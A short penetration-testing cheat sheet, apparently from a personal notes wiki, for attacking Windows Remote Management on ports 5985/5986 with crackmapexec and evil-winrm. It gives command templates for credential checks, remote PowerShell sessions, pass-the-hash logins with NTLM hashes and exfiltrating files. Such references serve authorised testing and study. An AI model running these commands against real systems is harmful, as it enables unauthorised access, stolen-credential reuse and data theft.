5985/5986 - Evil-winrm
My personal favorite
Check:
crackmapexec --verbose winrm <IP> -u <username> -p <password>
Try both ports:
evil-winrm -i <IP> -u <username> -p <password> -p <port>
Powershell session:
evil-winrm -i <IP> -u <username> -p <password>
Pass the hash (NTLM):
evil-winrm -i <IP> -u <username> -H <hash>
Exfil data using Evil-winrm:
download <File to be exfiltrated location> <Local location where it should be exfiltrated>
Last updated
Was this helpful?